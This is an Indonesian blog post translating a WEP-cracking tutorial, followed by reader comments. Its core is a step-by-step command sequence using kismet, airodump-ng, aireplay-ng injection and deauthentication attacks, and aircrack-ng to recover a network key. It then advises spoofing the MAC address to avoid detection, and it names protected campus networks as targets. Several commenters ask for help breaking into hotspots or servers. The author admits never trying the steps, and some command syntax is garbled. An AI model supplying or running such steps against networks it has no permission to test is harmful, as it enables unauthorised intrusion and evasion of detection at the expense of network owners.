Home > distro linux, docs, Live CD, Underground > Spoonfed Hacking – How to Crack WEP

Spoonfed Hacking – How to Crack WEP


bt.jpg

Hmmmm ….

Saya tidak tahu apa lagi yg mesti saya posting setelah beberapa minggu lalu kehilangan semua backup postingan dari site yg lama. Sehingga memaksa saya berposting ria disini bersama rekan2 bloger’s wordpress.com. Biar agak keren dikit tapi saya emang dodol, saya akan memberi oleh2 hasil melaut beberapa hari yg lalu. CRACK WEP !!!.

Apa itu CRACK WEP ???….
Saya sendiri juga kurang tahu. Lho … gak tau koq malah di posting ?? 😀 . Saya hanya tertarik pada bagian cracking security-nya pada wireless network connection. Selaen itu didaerah kmpus saya ternyata banyak juga lhoo yg wireless area nya diprotect. Nahh, bisa jadi bahan percobaan nih. Tapi sialnya saya gak punya tools utk coba cara ini. Itulah gunanya saya posting disini, jika anda udah berhasil maka secepatnya hubungi saya. 😀

Tutor ini hasil saduran Tutorial yang ditulis oleh glj12 dengan judul asli ” Spoonfed Hacking – How to Crack WEP (Local Hacking) Tutorial ” di leetupload.com

Baiklah langsung saja kita persiapkan apa saja yg dibutuhkan :

1. Laptop (tentunya :D) dg dual boot (Linux n Xp Pro).
2. CD blank untuk mbakar cd (ya iyalah).
3. Wireless Card yg bisa diinject (manipulasi-red) or liat list disini.
4. Baterai yg cukup.
5. Kismet ato netstumbler (jika ingin aman, Kismet didalam BackTrack 2 sudah komplit).
6. Ngerti linux sedikit aja …

Oke Tahap I :

1. Download dulu ISO BackTrack 2 di http://remote-exploit.org/backtrack_download.html, ato langsung ke tahap II jika udah punya Kismet.

2. Bakar ISO nya.

Tahap II :

1. Hidupin BackTrack 2 nya,

idup.jpg

2. Klo udah, BT2 alias BackTrack 2 minta username n passwd. Isi dengan root lalu toor

toor.jpg

3. Udah?? kita selanjutnya akan masuk GUI. Jika anda penggemar linux, pasti udah tau cara masuk GUI. ketik startx.
4. Jika udah, ntar akan muncul KdE desktop (klo gak slah lhoo… ). Trus masuk konsole
5. Trus ketik kismet dan tekan enter

komsole.jpg

Pic

6. Secara otomatis Kismet akan meload, mengupdate dan menampilkan semua akses point yang berada di daerah jaringan tsb,
7. Setelah pilih dan memilih target/korban.

kis.jpg

8. ketik : iwconfig wlan0 mode monitor

(Syntax: iwconfig device_name_here mode command_monitor). Jangan lupa di enter, terus ??

10. Saatnya ngintip :

Syntax: airodump-ng –-ivs_tipe_ekstensi –-write apaaja –-channel

Jadi perintahnya airodump-ng –ivs –write file_name –channel 11 wlan0

airdump.jpg

Perintah tsb akan memulai monitoring dan mengoleksi packet dari channel yg diinginkan.

11. Terus Nginject yukk…

Syntax:

aireplay-ng -3 attack level -b BSSID_router_yg_running -h attached_computer_to_the_bssid_the_router wlan0=tipe_device.

aireplay-ng -3 -b 00:16:B6:2E:C3:4E -h 00:14:A5:8A:02:CD wlan0

12. kita akan melakukan deauthentication attack. ketik :

Syntax : Aireplay-ng -0 attack_number wlan0 device_type_of_yours -a BSSID_router_yg_running wlan0 tipe_device

aireplay-ng -0 wlan0 -a 00:16:B6:2E:C3:4E wlan0

13. Hmm.. saya makin pusing nih. Tapi gak apa kita teruskan ..

Selanjutnya ganti direktori ke file apaaja.ivs yg disave tadi. kemudian eksekusi dengan perintah :

Syntax: aircrack-ng -0 attack_type -n number_of_the_encryption_type(64 or 128) -fudgefactor 2-18 *.cap or *.ivs

aircrack-ng -0 -n 128 -f 4 file_name.ivs

Catt : 00:16:B6:2E:C3:4E >> BSSID dari router yg running
00:14:A5:8A:02:CD >> Computer yg make BSSID (ditampilkan oleh kismet)
wlan0 >> device router yg kita gunain.
-0 >> Jenis serangan
-n >> tipe enkripsi (64 ato 128)
-fudgefactor >> isi 2-18
*.cap ato *.ivs >> ekstensi file yg disave

AKhirnya … binGGOOOOO …. ! . Kita dapetin kunci WEP (hex).

binggo.jpg

Terus langkah selanjutna tinggal konek ke SSID. ganti Mac address n Netbios nya dulu biar gak ketahuan MAC asli kita. Donlot programnya di irongeek.com atau bisa juga pake KMACS (saran red).

8.jpg

9.jpg

N HAving Fun ……..

hacking bukan sekedar TEORI, nahh …. itulah sebenarna yng benar. Jadi OBROLAN saya diatas tadi adalah bualan belaka. Cos saya belom pernah mempraktekkannya. Karena saya bukan MASTER!!!, jadi saya hanyalah pembual belaka …
Jadi ??? jika anda ingin mencobanya silahkan baca tutor aslinya di

http://www.leetupload.com

http://digg.com/security/Spoonfed_Hacking_How_to_Crack_WEP_Local_Hacking_Tutorial

  1. June 25, 2007 at 2:34 am

    waduh serem banget nhi tutor gue aja bacanya sampe abiss……..ntar deh aq cobe di komputer perpust ……….btw sekarang kan ada BT2 yg final iso donlot gih aq aja udah ada

  2. July 1, 2007 at 7:19 pm

    numpang liwat kang, matur suwun banget tutorial’e nggih, berguna banget, kulo badhe nyoba’ipun… matur suwun nggih kang,,,

  3. LAH
    July 13, 2007 at 7:53 am

    Aku udah download isonya bt2final.iso dari websitenya dan udah cek md5-nya setelah dibakar (burning .. ) ..jadi livecd…setelah beres..boot …menunggu…tidak ada error …terus nanyain login isi dengan “root” dan passwordnya dengan “toor” (tanpa tanda kutip)…eh kok dibilangin incorrect…berkali aku coba hasilnya sama…ada yang punya ide bagaimana solusinya ?

    #####################################
    lah … ak aja lom coba .. 😀 (jujur banget .. ;)) )
    tapi coba liat dulu manualnya …
    liat di http://www.remote-exploit.org/backtrack_docs.html

  4. July 17, 2007 at 11:29 am

    Taken from leetupload.com 😀

    ##############
    thanks for your correction. thanks to (author) n leetupload.com
    i’m just translate into indonesian lang. thanks
    regards
    deanet

  5. Ndeed
    September 4, 2007 at 12:38 pm

    KaKak2Qu seKalian… saya newbies…. pengen meminta sedikit iLmu dari kaKaK2 sekaLiaN…. kLo boLeh saYa Minta tutoriaL cara pemakaian Backtrack Makasih KaLo ada Yang Mau baca pesaNku KK … di tunggu tutorialnya kk makasih sebelumnya

  6. September 8, 2007 at 12:08 pm

    Super Progrrams !! Hacking !! Fuck

  7. September 8, 2007 at 12:10 pm

    Albanian Hacked !! Cracker nini … Midihack3r … Spidihack … nittyhack … Lushicack3r … SpidiHack …www.cn-security.com

  8. i nyoman sujendra
    November 22, 2007 at 6:13 am

    lha kok??

  9. xshadow
    December 26, 2007 at 3:29 pm

    tapi percuma juga seumpama SSID broadcast-nya di”disable”

    salam…

  10. patchme2
    December 29, 2007 at 6:48 am

    mas X shadow, zaman gene kok masih takut dengan ssid disable..
    Kalaw make window gunakan Netstumbler, kalo Make backtrack apa lagi,airjack keliatan,kismet juga, airodump pasti.


    ################
    yeah .. it’s great ..

  11. ROY CHANDRA
    January 1, 2008 at 10:18 am

    OKS JUGA NH!!! MINTA PANDUAN PRAKTIS UNTUK OS YG LAIN DONK (XP,VISTA), KITE2 MSH PADA PEMULA NH….KLO ADA TOLONG KIRIMIN YA KE royv3andra@yahoo.co.id. THANKS BUEEEERRRRRATTT

  12. me
    January 4, 2008 at 4:58 pm

    trims bro!!!

  13. January 20, 2008 at 8:22 am

    everynight i uses backtrax final v2.0 🙂 always dot the “i” and cross the “t”…

  14. santya
    January 20, 2008 at 10:42 am

    aku udah dapet key nya, 2 26 kali gimana ya untuk mengetahui setingg ip dan dsn gadeway nya apakah ada tools atau program yang bisa untuk itu,..

  15. January 23, 2008 at 10:27 am

    aduuuh…. klo dari win XP gimana yach???

    ##############
    @shionobigatakutmati , coba pake vmware ..

    @semua dicoba dulu aj yach …

    me lagi nyiapin bahan utk bt3 .. 😀

  16. ronal
    February 13, 2008 at 12:57 am

    Wah bagus bener nih tutor nya…
    tapi aku ga ngerti linux.

    Minta crack-an yang versi windows donk..
    thanks sebelumnya.

  17. March 1, 2008 at 2:08 pm

    ajarin cara bobol hostpot ya…plissssssssssss

    YM ku Scudetto1908 / yu_yu_h4kusho

    add ya

    link balik juga

    aku tunggu thanks

  18. noid'de
    March 26, 2008 at 5:37 pm

    bagus sih sy sy tidak ngerti linux..
    klo pake Xp apa boleh. klo blh pleees bagi bagi donk ilmunya
    jgn terlalu sekke..

  19. achmad
    April 14, 2008 at 3:49 am

    aircrack-ng ada ndak ya yang versi windowsnya ya???.say admin baru, admin lamanya lupa WEPnya jadi saya ndak bisa ngonekan wireless networknya..pusing. teman2 ada yang bisa mbantuin ndak yo????

  20. April 22, 2008 at 6:19 pm

    weleh, yang nulis ternyata belum coba….
    heheh….

  21. April 24, 2008 at 7:52 am

    wkekek … tau aj si rhakateza .
    heheh

  22. April 25, 2008 at 5:55 pm

    hehehe… BTW, saya di warnet namanya “deanet” lho!!! dekat kampus unhas makassar, apa crew nya yg punya blog ini???

  23. April 26, 2008 at 2:47 pm

    hihiih .. bukan la …

    [D]isassembler
    [E]ngine
    [A]nd
    [N]etwork
    [E]volution
    [T]echnolgy

    bgitulah kiranya misi dan visi saya dolo …
    skrg ga tau .. mo kmna tuh dibawa .. heheheh 😀

  24. Nur
    May 27, 2008 at 8:22 pm

    Minta Izin Copy Paste ke Blog saya buat senjata rahasia hacking hehehe mau hajar Server nih 🙂

  25. Nur
    May 27, 2008 at 8:23 pm

    Saya dah coba ini kalau terlau dalam bisa2 kita yang BUSTED…!!! ih serem…!!!

  26. July 19, 2008 at 8:41 am

    Wayoo. udah DL BT 3 final loom, Wuuiihh.. Cepetan! Wuhaha..

  27. ziluman
    August 20, 2008 at 5:58 am

    nice!!!!

  28. August 26, 2008 at 3:06 am

    mampir om ketempat saya

  29. November 5, 2008 at 3:58 am

    Support tdk pada xp 32bit?

  30. November 14, 2008 at 8:21 pm

    pls check it out:

    http://www.leetupload.com/dbindex2/index.php?dir=&search=wep&search_mode=f

    [video src="http://str0ke213.tradebit.com/pub/8/76.flv" /]

    thx

  31. March 24, 2009 at 6:56 pm

    Gak tau berapa lama saya pernah baca tutor dan saya langsung DL Backtrack 3 full.Gak tahu Hasil DLan mau diapain dari yg iso,usb dan vmware.gak bisa cara pakenya,pernah nyoba malah hancur windowsnya apalagi nge”HACK”.Mohon pencerahanya gan.

  32. siwok
    September 4, 2009 at 11:28 am

    aku makai SMCWUSB-g tapi nggak bisa njalanin kismet….apa nggak suport karena chipsetnya zydas?

    • September 4, 2009 at 4:49 pm

      oiya.. mungkin aj bisa ga support, coba cek di remote-exploit apa di situsnya kismet … 🙂

  33. benny
    July 4, 2010 at 6:10 pm

    mas blh kasih tau tutorial mengenai bactrack yang lain gak soalnya aku masih newbie

  34. May 10, 2012 at 9:53 pm

    master makasih ya udah mau shear ilmunya…
    salam kenal ya.

  1. No trackbacks yet.

Leave a Reply

